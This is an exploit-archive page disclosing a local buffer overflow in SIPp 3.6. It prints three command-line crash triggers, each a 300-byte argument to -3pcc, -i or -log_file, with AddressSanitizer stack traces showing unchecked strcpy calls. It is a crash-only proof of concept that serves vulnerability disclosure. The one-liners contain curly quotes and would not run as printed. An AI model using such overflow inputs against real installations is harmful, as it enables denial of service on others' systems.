Sipp 3.6 local buffer overflow (poc) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-07-02 | Type : dos | Platform : linux
This exploit / vulnerability Sipp 3.6 local buffer overflow (poc) is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Exploit Title: SIPp 3.6 - Local Buffer Overflow (PoC)
# Date: 2018-06-30
# Exploit Author: Fakhri Zulkifli
# Vendor Homepage: http://sipp.sourceforge.net/
# Software Link: https://github.com/SIPp/sipp/releases
# Version: 3.6-dev and earlier
# Tested on: 3.6-dev

$ ./sipp -3pcc `python -c ‘print “A” * 300'`

#0 0x448364 in strcpy /home/user/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:425
#1 0x668d06 in main /home/user/sipp/src/sipp.cpp:1531:17
#2 0x7ff5ec21282f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#3 0x41f1a8 in _start (/home/user/sipp/sipp+0x41f1a8)

$ ./sipp -i `python -c ‘print “A” * 300'`

#0 0x448364 in strcpy /home/user/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:425
#1 0x66a303 in main /home/user/sipp/src/sipp.cpp:1477:17
#2 0x7f281302682f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#3 0x41f1a8 in _start (/home/user/sipp/sipp+0x41f1a8)

$ ./sipp -log_file `python -c ‘print “A” * 300'`

#0 0x448364 in strcpy /home/user/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:425
#1 0x66912f in main /home/user/sipp/src/sipp.cpp:1706:17
#2 0x7f6ca663782f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#3 0x41f1a8 in _start (/home/user/sipp/sipp+0x41f1a8)